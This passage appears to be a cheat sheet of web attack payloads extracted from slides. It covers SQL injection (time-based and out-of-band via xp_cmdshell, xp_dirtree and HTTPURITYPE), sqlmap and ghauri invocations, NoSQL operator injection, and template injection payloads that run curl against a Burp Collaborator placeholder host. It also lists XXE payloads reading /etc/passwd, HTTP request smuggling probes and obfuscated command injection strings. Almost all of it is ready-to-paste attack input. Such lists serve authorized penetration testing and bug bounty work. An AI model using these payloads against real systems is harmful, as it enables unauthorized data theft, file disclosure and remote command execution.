`)))+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURPCOLLABORATOR/">+%25remote%3b+]>'),'/x')+FROM+dual+-- '))+AND+1=(SELECT+HTTPURITYPE('http://BURPCOLLABORATOR').GETCLOB()+FROM+DUAL)+--
')))+AND+1=(SELECT+HTTPURITYPE('http://BURPCOLLABORATOR').GETCLOB()+FROM+DUAL)+--
"+AND+1=(SELECT+HTTPURITYPE('http://BURPCOLLABORATOR').GETCLOB()+FROM+DUAL)+--
")+AND+1=(SELECT+HTTPURITYPE('http://BURPCOLLABORATOR').GETCLOB()+FROM+DUAL)+--
"))+AND+1=(SELECT+HTTPURITYPE('http://BURPCOLLABORATOR').GETCLOB()+FROM+DUAL)+--
")))+AND+1=(SELECT+HTTPURITYPE('http://BURPCOLLABORATOR').GETCLOB()+FROM+DUAL)+--
`+AND+1=(SELECT+HTTPURITYPE('http://BURPCOLLABORATOR').GETCLOB()+FROM+DUAL)+--
`)+AND+1=(SELECT+HTTPURITYPE('http://BURPCOLLABORATOR').GETCLOB()+FROM+DUAL)+--
`))+AND+1=(SELECT+HTTPURITYPE('http://BURPCOLLABORATOR').GETCLOB()+FROM+DUAL)+--
`)))+AND+1=(SELECT+HTTPURITYPE('http://BURPCOLLABORATOR').GETCLOB()+FROM+DUAL)+--
+UNION+SELECT+HTTPURITYPE('http://BURPCOLLABORATOR').GETCLOB()+FROM+DUAL+--
)+UNION+SELECT+HTTPURITYPE('http://BURPCOLLABORATOR').GETCLOB()+FROM+DUAL+--
))+UNION+SELECT+HTTPURITYPE('http://BURPCOLLABORATOR').GETCLOB()+FROM+DUAL+--
)))+UNION+SELECT+HTTPURITYPE('http://BURPCOLLABORATOR').GETCLOB()+FROM+DUAL+--
'+UNION+SELECT+HTTPURITYPE('http://BURPCOLLABORATOR').GETCLOB()+FROM+DUAL+--
')+UNION+SELECT+HTTPURITYPE('http://BURPCOLLABORATOR').GETCLOB()+FROM+DUAL+--
'))+UNION+SELECT+HTTPURITYPE('http://BURPCOLLABORATOR').GETCLOB()+FROM+DUAL+--
')))+UNION+SELECT+HTTPURITYPE('http://BURPCOLLABORATOR').GETCLOB()+FROM+DUAL+--
"+UNION+SELECT+HTTPURITYPE('http://BURPCOLLABORATOR').GETCLOB()+FROM+DUAL+--
")+UNION+SELECT+HTTPURITYPE('http://BURPCOLLABORATOR').GETCLOB()+FROM+DUAL+--
"))+UNION+SELECT+HTTPURITYPE('http://BURPCOLLABORATOR').GETCLOB()+FROM+DUAL+--
")))+UNION+SELECT+HTTPURITYPE('http://BURPCOLLABORATOR').GETCLOB()+FROM+DUAL+--
`+UNION+SELECT+HTTPURITYPE('http://BURPCOLLABORATOR').GETCLOB()+FROM+DUAL+--
`)+UNION+SELECT+HTTPURITYPE('http://BURPCOLLABORATOR').GETCLOB()+FROM+DUAL+--
`))+UNION+SELECT+HTTPURITYPE('http://BURPCOLLABORATOR').GETCLOB()+FROM+DUAL+--
`)))+UNION+SELECT+HTTPURITYPE('http://BURPCOLLABORATOR').GETCLOB()+FROM+DUAL+--
SQL Injection
4 - TIME-Based AND DNS Exfiltration SQL Injection Payloads

Microsoft SQL

;WAITFOR+DELAY+'0:0:15'+--
);WAITFOR+DELAY+'0:0:15'+--
));WAITFOR+DELAY+'0:0:15'+--
)));WAITFOR+DELAY+'0:0:15'+--
';WAITFOR+DELAY+'0:0:15'+--
');WAITFOR+DELAY+'0:0:15'+--
'));WAITFOR+DELAY+'0:0:15'+--
')));WAITFOR+DELAY+'0:0:15'+--
";WAITFOR+DELAY+'0:0:15'+--
");WAITFOR+DELAY+'0:0:15'+--
"));WAITFOR+DELAY+'0:0:15'+--
")));WAITFOR+DELAY+'0:0:15'+--
`;WAITFOR+DELAY+'0:0:15'+--
`);WAITFOR+DELAY+'0:0:15'+--
`));WAITFOR+DELAY+'0:0:15'+--
`)));WAITFOR+DELAY+'0:0:15'+--
;IF(1=1)+WAITFOR+DELAY+'0:0:15'+--
);IF(1=1)+WAITFOR+DELAY+'0:0:15'+--
));IF(1=1)+WAITFOR+DELAY+'0:0:15'+--
)));IF(1=1)+WAITFOR+DELAY+'0:0:15'+--
';IF(1=1)+WAITFOR+DELAY+'0:0:15'+--
');IF(1=1)+WAITFOR+DELAY+'0:0:15'+--
'));IF(1=1)+WAITFOR+DELAY+'0:0:15'+--
')));IF(1=1)+WAITFOR+DELAY+'0:0:15'+--
";IF(1=1)+WAITFOR+DELAY+'0:0:15'+--
");IF(1=1)+WAITFOR+DELAY+'0:0:15'+--
"));IF(1=1)+WAITFOR+DELAY+'0:0:15'+--
")));IF(1=1)+WAITFOR+DELAY+'0:0:15'+--
`;IF(1=1)+WAITFOR+DELAY+'0:0:15'+--
`);IF(1=1)+WAITFOR+DELAY+'0:0:15'+--
`));IF(1=1)+WAITFOR+DELAY+'0:0:15'+--
`)));IF(1=1)+WAITFOR+DELAY+'0:0:15'+--
;EXEC+xp_cmdshell+'nslookup+BURPCOLLABORATOR'+--
);EXEC+xp_cmdshell+'nslookup+BURPCOLLABORATOR'+--
));EXEC+xp_cmdshell+'nslookup+BURPCOLLABORATOR'+--
)));EXEC+xp_cmdshell+'nslookup+BURPCOLLABORATOR'+--
';EXEC+xp_cmdshell+'nslookup+BURPCOLLABORATOR'+--
');EXEC+xp_cmdshell+'nslookup+BURPCOLLABORATOR'+--
'));EXEC+xp_cmdshell+'nslookup+BURPCOLLABORATOR'+--
')));EXEC+xp_cmdshell+'nslookup+BURPCOLLABORATOR'+--
";EXEC+xp_cmdshell+'nslookup+BURPCOLLABORATOR'+--
");EXEC+xp_cmdshell+'nslookup+BURPCOLLABORATOR'+--
"));EXEC+xp_cmdshell+'nslookup+BURPCOLLABORATOR'+--
")));EXEC+xp_cmdshell+'nslookup+BURPCOLLABORATOR'+--
`;EXEC+xp_cmdshell+'nslookup+BURPCOLLABORATOR'+--
`);EXEC+xp_cmdshell+'nslookup+BURPCOLLABORATOR'+--
`));EXEC+xp_cmdshell+'nslookup+BURPCOLLABORATOR'+--
`)));EXEC+xp_cmdshell+'nslookup+BURPCOLLABORATOR'+--
;EXEC+master..xp_dirtree+'//BURPCOLLABORATOR/x'+--
);EXEC+master..xp_dirtree+'//BURPCOLLABORATOR/x'+--
));EXEC+master..xp_dirtree+'//BURPCOLLABORATOR/x'+--
)));EXEC+master..xp_dirtree+'//BURPCOLLABORATOR/x'+--
';EXEC+master..xp_dirtree+'//BURPCOLLABORATOR/x'+--
');EXEC+master..xp_dirtree+'//BURPCOLLABORATOR/x'+--
'));EXEC+master..xp_dirtree+'//BURPCOLLABORATOR/x'+--
')));EXEC+master..xp_dirtree+'//BURPCOLLABORATOR/x'+--
";EXEC+master..xp_dirtree+'//BURPCOLLABORATOR/x'+--
");EXEC+master..xp_dirtree+'//BURPCOLLABORATOR/x'+--
"));EXEC+master..xp_dirtree+'//BURPCOLLABORATOR/x'+--
")));EXEC+master..xp_dirtree+'//BURPCOLLABORATOR/x'+--
`;EXEC+master..xp_dirtree+'//BURPCOLLABORATOR/x'+--
`);EXEC+master..xp_dirtree+'//BURPCOLLABORATOR/x'+--
`));EXEC+master..xp_dirtree+'//BURPCOLLABORATOR/x'+--
`)));EXEC+master..xp_dirtree+'//BURPCOLLABORATOR/x'+--
;EXEC+master..xp_dirtree+'\\\\BURPCOLLABORATOR\\x'+--
);EXEC+master..xp_dirtree+'\\\\BURPCOLLABORATOR\\x'+--
));EXEC+master..xp_dirtree+'\\\\BURPCOLLABORATOR\\x'+--
)));EXEC+master..xp_dirtree+'\\\\BURPCOLLABORATOR\\x'+--
';EXEC+master..xp_dirtree+'\\\\BURPCOLLABORATOR\\x'+--
');EXEC+master..xp_dirtree+'\\\\BURPCOLLABORATOR\\x'+--
'));EXEC+master..xp_dirtree+'\\\\BURPCOLLABORATOR\\x'+--
')));EXEC+master..xp_dirtree+'\\\\BURPCOLLABORATOR\\x'+--
";EXEC+master..xp_dirtree+'\\\\BURPCOLLABORATOR\\x'+--
");EXEC+master..xp_dirtree+'\\\\BURPCOLLABORATOR\\x'+--
"));EXEC+master..xp_dirtree+'\\\\BURPCOLLABORATOR\\x'+--
")));EXEC+master..xp_dirtree+'\\\\BURPCOLLABORATOR\\x'+--
`;EXEC+master..xp_dirtree+'\\\\BURPCOLLABORATOR\\x'+--
`);EXEC+master..xp_dirtree+'\\\\BURPCOLLABORATOR\\x'+--
`));EXEC+master..xp_dirtree+'\\\\BURPCOLLABORATOR\\x'+--
`)));EXEC+master..xp_dirtree+'\\\\BURPCOLLABORATOR\\x'+--
;EXEC+master.dbo.xp_dirtree+'//BURPCOLLABORATOR/x'+--
);EXEC+master.dbo.xp_dirtree+'//BURPCOLLABORATOR/x'+--
));EXEC+master.dbo.xp_dirtree+'//BURPCOLLABORATOR/x'+--
)));EXEC+master.dbo.xp_dirtree+'//BURPCOLLABORATOR/x'+--
';EXEC+master.dbo.xp_dirtree+'//BURPCOLLABORATOR/x'+--
');EXEC+master.dbo.xp_dirtree+'//BURPCOLLABORATOR/x'+--
'));EXEC+master.dbo.xp_dirtree+'//BURPCOLLABORATOR/x'+--
')));EXEC+master.dbo.xp_dirtree+'//BURPCOLLABORATOR/x'+--
";EXEC+master.dbo.xp_dirtree+'//BURPCOLLABORATOR/x'+--
");EXEC+master.dbo.xp_dirtree+'//BURPCOLLABORATOR/x'+--
"));EXEC+master.dbo.xp_dirtree+'//BURPCOLLABORATOR/x'+--
")));EXEC+master.dbo.xp_dirtree+'//BURPCOLLABORATOR/x'+--
`;EXEC+master.dbo.xp_dirtree+'//BURPCOLLABORATOR/x'+--
`);EXEC+master.dbo.xp_dirtree+'//BURPCOLLABORATOR/x'+--
`));EXEC+master.dbo.xp_dirtree+'//BURPCOLLABORATOR/x'+--
`)));EXEC+master.dbo.xp_dirtree+'//BURPCOLLABORATOR/x'+--
;EXEC+master.dbo.xp_dirtree+'\\\\BURPCOLLABORATOR\\x'+--
);EXEC+master.dbo.xp_dirtree+'\\\\BURPCOLLABORATOR\\x'+--
));EXEC+master.dbo.xp_dirtree+'\\\\BURPCOLLABORATOR\\x'+--
)));EXEC+master.dbo.xp_dirtree+'\\\\BURPCOLLABORATOR\\x'+--
';EXEC+master.dbo.xp_dirtree+'\\\\BURPCOLLABORATOR\\x'+--
');EXEC+master.dbo.xp_dirtree+'\\\\BURPCOLLABORATOR\\x'+--
'));EXEC+master.dbo.xp_dirtree+'\\\\BURPCOLLABORATOR\\x'+--
')));EXEC+master.dbo.xp_dirtree+'\\\\BURPCOLLABORATOR\\x'+--
";EXEC+master.dbo.xp_dirtree+'\\\\BURPCOLLABORATOR\\x'+--
");EXEC+master.dbo.xp_dirtree+'\\\\BURPCOLLABORATOR\\x'+--
"));EXEC+master.dbo.xp_dirtree+'\\\\BURPCOLLABORATOR\\x'+--
")));EXEC+master.dbo.xp_dirtree+'\\\\BURPCOLLABORATOR\\x'+--
`;EXEC+master.dbo.xp_dirtree+'\\\\BURPCOLLABORATOR\\x'+--
`);EXEC+master.dbo.xp_dirtree+'\\\\BURPCOLLABORATOR\\x'+--
`));EXEC+master.dbo.xp_dirtree+'\\\\BURPCOLLABORATOR\\x'+--
`)));EXEC+master.dbo.xp_dirtree+'\\\\BURPCOLLABORATOR\\x'+--
SQL Injection
5 - SQL Injection Tools

SQLmap

┌──(mahmoud㉿mohamed)-[~]
└─$ python3 sqlmap

-r URLRequest.txt

-v 3
POST /Path HTTP/1.1
Host: SUB.ROOT.TLD
--force-ssl User-Agent: Mozilla
Content-Type: application/x-www-form-urlencoded
--delay 3 Content-Length: length
Accept-Language: en-us
Accept-Encoding: gzip, deflate
--retries 3
chunk=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaa8KB-
--threads 3 ∞aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&licenseID=string*&c
ontent=string
--dbms DB

--tamper Tamper
POST /Path HTTP/1.1
Host: SUB.ROOT.TLD
--level 5 User-Agent: Mozilla
Content-Type: application/x-www-form-urlencoded
--risk 3 Content-Length: length
Accept-Language: en-us
Accept-Encoding: gzip, deflate
--technique T
chunk=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaa8KB-
--time-sec 15 ∞aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&licenseID=string%I
NJECT HERE%&content=string
--hostname

--alert
SQL Injection
5 - SQL Injection Tools

ghauri

┌──(mahmoud㉿mohamed)-[~]
└─$ ghauri

-r URLRequest.txt
POST /Path HTTP/1.1
Host: SUB.ROOT.TLD
-v 3 User-Agent: Mozilla
Content-Type: application/x-www-form-urlencoded
--force-ssl Content-Length: length
Accept-Language: en-us
Accept-Encoding: gzip, deflate
--delay 3
chunk=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaa8KB-
--retries 3
∞aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&licenseID=string*&c
ontent=string
--threads 3

--confirm
POST /Path HTTP/1.1
--hostname Host: SUB.ROOT.TLD
User-Agent: Mozilla
Content-Type: application/x-www-form-urlencoded
--level 3 Content-Length: length
Accept-Language: en-us
Accept-Encoding: gzip, deflate
--technique T
chunk=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
--time-sec 15 aaaaaaaaaaaaaaaa8KB-
∞aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&licenseID=string%I
NJECT HERE%&content=string
-p parameter
SQL Injection
5 - SQL Injection Tools

burp-send-to

xfce4-terminal -H -e %C

ghauri

ghauri -r %R --force-ssl --delay 1 --timeout 30 --threads 10

--retries 5 --time-sec 15 --level 3 --confirm --batch

SQLi

sqlmap

sqlmap -r %R --force-ssl --skip Accept --delay 1 --timeout 30

--threads 10 retries 5 --time-sec 15 --level 5 --risk 3 --fingerprint
--skip-waf --batch --answer="redirect=N"

SQLi
NOSQL Injection
1 - NOSQL Injection Fuzzing Detection

Parameter[]=One&Parameter[]=Two
==
{"Parameter":["One","Two"]}
e.g.
pass[]=1234&pass[]=5678
==
{"pass":["1234","5678"]}
OR
email[]=victim&email[]=attacker
==
{"email":["victim","attacker"]}

Parameter[One]=Two
==
{"Parameter":{"One":"Two"}}
e.g.
pass[$ne]=X
==
{"pass":{"$ne":"X"}} $eq
OR $ne
Parameter=Value users[email]=attacker $gt
== $where
{"users":{"email":"attacker"}} $regex

Parameter[One][Two]=Three
==
{"Parameter":{"One":{"Two":"Three"}}}
e.g.
users[pass][$ne]=X
==
{"users":{"pass":{"$ne":"X"}}}

Parameter[One][]=Two&Parameter[One][]=Three
==
{"Parameter":{"One":["Two","Three"]}}
e.g.
pass[$ne][]=X&pass[$ne][]=Y
==
{"pass":{"$ne":["X","Y"]}}
OR
users[email][]=victim&users[email][]=attacker
==
{"users":{"email":["victim","attacker"]}}
NOSQL Injection
1 - NOSQL Injection Fuzzing Detection

});%00 });//
'});%00 '});//
"});%00 "});//
`});%00 `});//
}});%00 }});//
'}});%00 '}});//
"}});%00 "}});//
`}});%00 `}});//
}}});%00 }}});//
'}}});%00 '}}});//
"}}});%00 "}}});// ' && '1'=='1'%00
`}}});%00 `}}});// ' && '1'=='2'%00
}}}});%00 }}}});//
'}}}});%00 '}}}});// ' || '1'=='1'%00
"}}}});%00 "}}}});// ' || '1'=='2'%00
`}}}});%00 `}}}});// " && "1"=="1"%00
]});%00 ]});//
']});%00 ']});// " && "1"=="2"%00
"]});%00 "]});// " || "1"=="1"%00
`]});%00 `]});// " || "1"=="2"%00
]}});%00 ]}});//
']}});%00 ']}});// ` && `1`==`1`%00
"]}});%00 "]}});// ` && `1`==`2`%00
`]}});%00 `]}});// ` || `1`==`1`%00
]}}});%00 ]}}});//
']}}});%00 ']}}});// ` || `1`==`2`%00
"]}}});%00 "]}}});//
`]}}});%00 `]}}});//
]}}}});%00 ]}}}});//
']}}}});%00 ']}}}});//
"]}}}});%00 "]}}}});//
`]}}}});%00 `]}}}});//
}]);%00 }]);//
'}]);%00 '}]);//
"}]);%00 "}]);// '%20%26%26%20'1'%3d%3d'1'%00
`}]);%00 `}]);//
}}]);%00 }}]);// '%20%26%26%20'1'%3d%3d'2'%00
'}}]);%00 '}}]);//
"}}]);%00 "}}]);//
`}}]);%00 `}}]);//
}}}]);%00 }}}]);// '%20%7c%7c%20'1'%3d%3d'1'%00
'}}}]);%00 '}}}]);//
"}}}]);%00 "}}}]);// '%20%7c%7c%20'1'%3d%3d'2'%00
`}}}]);%00 `}}}]);//
}}}}]);%00 }}}}]);//
'}}}}]);%00 '}}}}]);//
"}}}}]);%00 "}}}}]);//
`}}}}]);%00 `}}}}]);//
Server Side Template Injection
1 - Server Side Template Injection Detection

ss#set($x=7*7)${x}ti
ss#{7*7}ti
ss${7*7}ti
ss${{7*7}}ti
ss(7*7)ti
ss<%=+7*7+%>ti
ss@{7*7}ti
ss@{{7*7}}ti
ss[[${7*7}]]ti
ss{7*7}ti
ss{{7*'7'}}ti
ss{{7*7}}ti
ss{{=7*7}}ti
ss{{len+`4444`}}{{len+`999999999`}}ti
{{printf+"ss%sti"+"49"+}}
{%+debug+%}
{{+this+}}
ss%23set($x=7*7)$%7Bx%7Dti
ss%23%7B7*7%7Dti
ss$%7B7*7%7Dti
ss$%7B%7B7*7%7D%7Dti
ss(7*7)ti
ss<%=+7*7+%>ti
ss@%7B7*7%7Dti
ss@%7B%7B7*7%7D%7Dti
ss[[$%7B7*7%7D]]ti
ss%7B7*7%7Dti
ss%7B%7B7*'7'%7D%7Dti
ss%7B%7B7*7%7D%7Dti
ss%7B%7B=7*7%7D%7Dti
ss%7B%7Blen+`4444`%7D%7D%7B%7Blen+`999999999`%7D%7Dti
%7B%7Bprintf+"ss%sti"+"49"+%7D%7D
%7B%+debug+%%7D
%7B%7B+this+%7D%7D
ss%2523set($x=7*7)$%257Bx%257Dti
ss%2523%257B7*7%257Dti
ss$%257B7*7%257Dti
ss$%257B%257B7*7%257D%257Dti
ss(7*7)ti
ss<%=+7*7+%>ti
ss@%257B7*7%257Dti
ss@%257B%257B7*7%257D%257Dti
ss[[$%257B7*7%257D]]ti
ss%257B7*7%257Dti
ss%257B%257B7*'7'%257D%257Dti
ss%257B%257B7*7%257D%257Dti
ss%257B%257B=7*7%257D%257Dti
ss%257B%257Blen+`4444`%257D%257D%257B%257Blen+`999999999`%257D%257Dti
%257B%257Bprintf+"ss%sti"+"49"+%257D%257D
%257B%+debug+%%257D
%257B%257B+this+%257D%257D
Server Side Template Injection
1 - Server Side Template Injection Detection

<%=+system("curl+1.BURPCOLLABORATOR")%>
<%=%x(curl+2.BURPCOLLABORATOR)%>
#{system("curl+3.BURPCOLLABORATOR")}
#{%x(curl+4.BURPCOLLABORATOR)}
{%+import+os+%}{{os.popen("curl+5.BURPCOLLABORATOR").read()}}
{{self.__init__.__globals__.__builtins__.__import__('os').popen('curl+6.BURPCOLLABORATOR').read()}}
{system("curl+7.BURPCOLLABORATOR")}
{{=global.process.mainModule.require('child_process').execSync('curl+8.BURPCOLLABORATOR').toString()}}
<%=global.process.mainModule.require('child_process').execSync('curl+9.BURPCOLLABORATOR').toString()%>
#{global.process.mainModule.require('child_process').execSync('curl+10.BURPCOLLABORATOR').toString()}
{{=global.process.mainModule.require('child_process').execSync('curl+11.BURPCOLLABORATOR').toString()}}
{{range.constructor("return+eval(\"global.process.mainModule.require('child_process').execSync('curl+12.BURPCOLLABORATOR').toString()\")")()}}
{{constructor.constructor("global.process.mainModule.require('child_process').execSync('curl+13.BURPCOLLABORATOR').toString()")()}}
<#assign+ex="freemarker.template.utility.Execute"?new()>${ex("curl+14.BURPCOLLABORATOR")}
[[${#[email protected]@getRuntime(),#rt.exec("curl+15.BURPCOLLABORATOR").waitFor()}]]
#set($engine="")#set($proc=$engine.getClass().forName("java.lang.Runtime").getRuntime().exec("curl+16.BURPCOLLABORATOR"))#set($null=$proc.waitFor())${null}
<%=+system("curl+17.BURPCOLLABORATOR")%>
<%=%x(curl+18.BURPCOLLABORATOR)%>
%23%7Bsystem("curl+19.BURPCOLLABORATOR")%7D
%23%7B%x(curl+20.BURPCOLLABORATOR)%7D
%7B%+import+os+%%7D%7B%7Bos.popen("curl+21.BURPCOLLABORATOR").read()%7D%7D
%7B%7Bself.__init__.__globals__.__builtins__.__import__('os').popen('curl+22.BURPCOLLABORATOR').read()%7D%7D
%7Bsystem("curl+23.BURPCOLLABORATOR")%7D
%7B%7B=global.process.mainModule.require('child_process').execSync('curl+24.BURPCOLLABORATOR').toString()%7D%7D
<%=global.process.mainModule.require('child_process').execSync('curl+25.BURPCOLLABORATOR').toString()%>
%23%7Bglobal.process.mainModule.require('child_process').execSync('curl+26.BURPCOLLABORATOR').toString()%7D
%7B%7B=global.process.mainModule.require('child_process').execSync('curl+27.BURPCOLLABORATOR').toString()%7D%7D
%7B%7Brange.constructor("return+eval(\"global.process.mainModule.require('child_process').execSync('curl+28.BURPCOLLABORATOR').toString()\")")()%7D%7D
%7B%7Bconstructor.constructor("global.process.mainModule.require('child_process').execSync('curl+29.BURPCOLLABORATOR').toString()")()%7D%7D
<%23assign+ex="freemarker.template.utility.Execute"?new()>$%7Bex("curl+30.BURPCOLLABORATOR")%7D
[[$%7B%[email protected]@getRuntime(),%23rt.exec("curl+31.BURPCOLLABORATOR").waitFor()%7D]]
%23set($engine="")%23set($proc=$engine.getClass().forName("java.lang.Runtime").getRuntime().exec("curl+32.BURPCOLLABORATOR"))%23set($null=$proc.waitFor())$%7Bnull%7D
<%=+system("curl+33.BURPCOLLABORATOR")%>
<%=%x(curl+34.BURPCOLLABORATOR)%>
%2523%257Bsystem("curl+35.BURPCOLLABORATOR")%257D
%2523%257B%x(curl+36.BURPCOLLABORATOR)%257D
%257B%+import+os+%%257D%257B%257Bos.popen("curl+37.BURPCOLLABORATOR").read()%257D%257D
%257B%257Bself.__init__.__globals__.__builtins__.__import__('os').popen('curl+38.BURPCOLLABORATOR').read()%257D%257D
%257Bsystem("curl+39.BURPCOLLABORATOR")%257D
%257B%257B=global.process.mainModule.require('child_process').execSync('curl+40.BURPCOLLABORATOR').toString()%257D%257D
<%=global.process.mainModule.require('child_process').execSync('curl+41.BURPCOLLABORATOR').toString()%>
%2523%257Bglobal.process.mainModule.require('child_process').execSync('curl+42.BURPCOLLABORATOR').toString()%257D
%257B%257B=global.process.mainModule.require('child_process').execSync('curl+43.BURPCOLLABORATOR').toString()%257D%257D
%257B%257Brange.constructor("return+eval(\"global.process.mainModule.require('child_process').execSync('curl+44.BURPCOLLABORATOR').toString()\")")()%257D%257D
%257B%257Bconstructor.constructor("global.process.mainModule.require('child_process').execSync('curl+45.BURPCOLLABORATOR').toString()")()%257D%257D
<%2523assign+ex="freemarker.template.utility.Execute"?new()>$%257Bex("curl+46.BURPCOLLABORATOR")%257D
[[$%257B%[email protected]@getRuntime(),%2523rt.exec("curl+47.BURPCOLLABORATOR").waitFor()%257D]]
%2523set($engine="")%2523set($proc=$engine.getClass().forName("java.lang.Runtime").getRuntime().exec("curl+48.BURPCOLLABORATOR"))%2523set($null=$proc.waitFor())$%257Bnull%257D
XML External Entity
1 - XML External Entity Payloads

Retrieve Files Out-Of-Band Interaction

<?xml version="1.0" encoding="UTF-8"?> <?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE file [ <!DOCTYPE OOB [
<!ENTITY xxe SYSTEM "file:///etc/passwd"> <!ENTITY xxe SYSTEM "http://BURPCOLLABORATOR">
]> ]>
<root> <root>
<parameter>&xxe;</parameter> <parameter>&xxe;</parameter>
</root> </root>

<?xml version="1.0" encoding="UTF-8"?> <?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE file [ <!DOCTYPE OOB [
<!ENTITY xxe PUBLIC "file:///etc/passwd"> <!ENTITY % xxe SYSTEM "http://BURPCOLLABORATOR">
]> %xxe; ]>
<root> <Root>
<parameter>&xxe;</parameter> <Parameter>Value</Parameter>
</root> </Root>

<!DOCTYPE svg [ <?xml version="1.0" encoding="UTF-8"?>

<!ENTITY file SYSTEM "file:///etc/passwd"> <!DOCTYPE OOB [
]> <!ENTITY xxe PUBLIC "http://BURPCOLLABORATOR">
<svg xmlns="http://www.w3.org/2000/svg"> ]>
<rect width="500" height="500" style="fill:rgb(255,0,0);"/> <root>
<text x="10" y="30">&file;</text> <parameter>&xxe;</parameter>
</svg> </root>

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE OOB [
<!ENTITY % xxe PUBLIC "http://BURPCOLLABORATOR">
%xxe; ]>
<Root>
<Parameter>Value</Parameter>
</Root>
XML External Entity
2 - XML External Entity Payloads

All in one !

<?xml version="1.0" encoding="utf-8"?>

<?xml-stylesheet type="text/xml" href="http://xsl.BURPCOLLABORATOR/file.xsl"?>
<!DOCTYPE root PUBLIC "-//A/B/EN" http://dtd.BURPCOLLABORATOR/file.dtd [
<!ENTITY % remote SYSTEM "http://xxe.BURPCOLLABORATOR/">
<!ENTITY xxe SYSTEM "http://xxe.BURPCOLLABORATOR/">
%remote;
]>
<root>
<parameter>&xxe;</parameter>
<one xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="http://xi.BURPCOLLABORATOR/"/></one>
<two xmlns=http://a.b/ xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://a.b/ http://schemalocation.BURPCOLLABORATOR/file.xsd">run</two>
</root>

XInclude

<?xml version="1.0"?> <?xml version="1.0"?>

<xsl:import> AND <xsl:include>

<?xml version="1.0" ?>

<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:include href="file:///etc/passwd"/>
<xsl:import href="file:///etc/passwd"/>
</xsl:stylesheet>

XSL Document

<?xml version="1.0" encoding="UTF-8"?>

<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<xsl:copy-of select="document('file:///etc/passwd')"/>
</xsl:template>
</xsl:stylesheet>
HTTP Request Smuggling
1 - HTTP Request Smuggling Detection

CL.0 TE.0

POST / HTTP/1.1 POST / HTTP/1.1

Host: www.company.com Host: www.company.com
Content-Length: 27 Transfer-Encoding: chunked
Connection: keep-alive Connection: keep-alive

GET /xxxxxxx HTTP/1.1 34

X: X POST /xxxxxxx HTTP/1.1
Host: www.company.com

x=1
0
HTTP Request Smuggling
1 - HTTP Request Smuggling Detection

CL.TE TE.CL

POST / HTTP/1.1
Host: www.company.com POST / HTTP/1.1
Content-Length: 32 Host: www.company.com
Transfer-Encoding: chunked Transfer-Encoding: chunked
Content-Length: 4
0
34
GET /xxxxxxx HTTP/1.1 POST /xxxxxxx HTTP/1.1
X: X Host: www.company.com

x=1
POST / HTTP/1.1
0
Host: www.company.com
Content-Length: 49
Transfer-Encoding: chunked

0
POST / HTTP/2
GET /xxxxxxx HTTP/1.1 Host: www.company.com
Host: localhost Content-Length: 0

X= GET /xxxxxxx HTTP/1.1

Host: www.company.com

POST / HTTP/2 x=1

Host: www.company.com
Transfer-Encoding: chunked

0 POST / HTTP/2
Host: www.company.com
GET /xxxxxxx HTTP/1.1 Content-Length: 0
Host: www.company.com
GET /xxxxxxx HTTP/1.1
Host: localhost

POST / HTTP/2
Host: www.company.com
X: Y\r\nransfer-Encoding: chunked

0
GET / HTTP/2
GET /xxxxxxx HTTP/1.1 Host: www.company.com
Host: www.company.com X: Y\r\nGET /xxxxxxx HTTP/1.1\rn
Host: localhost

GET / HTTP/2
Host: www.company.com
X: Y\r\n\rnGET /xxxxxxx HTTP/1.1\r\n
Host: www.company.com\r\nY
HTTP Request Smuggling
1 - HTTP Request Smuggling Detection

TE.TE

POST / HTTP/1.1
Host: www.company.com
Transfer-Encoding: chunked
Transfer-Encoding: nothing
Content-Length: 4

34
POST /xxxxxxx HTTP/1.1
Host: www.company.com

x=1
0

HTTP Request Smuggling

2 - HTTP Request Smuggling Tool

smuggler

┌──(mahmoud㉿mohamed)-[~]
└─$ python3 smuggler.py

--quiet

--timeout 15

--configfile exhaustive.py

--url
HTTP Request Smuggling
2 - HTTP Request Smuggling Tool

burp-send-to

xfce4-terminal -H -e %C

Smuggler

python3 smuggler.py --quiet --timeout 10 --configfile

exhaustive.py --url %U

HTTP Request Smuggler

OS Command Injection
1 - OS Command Injection Detection

&nslookup OAST &'\"`0&nslookup OAST&`'

whoami
w'h'o'am'i
wh''oami
w"h"o"am"i
; wh""oami ;
\r wh`òami \r
0xa0 w\ho\am\i 0xa0
&& who$@ami &&
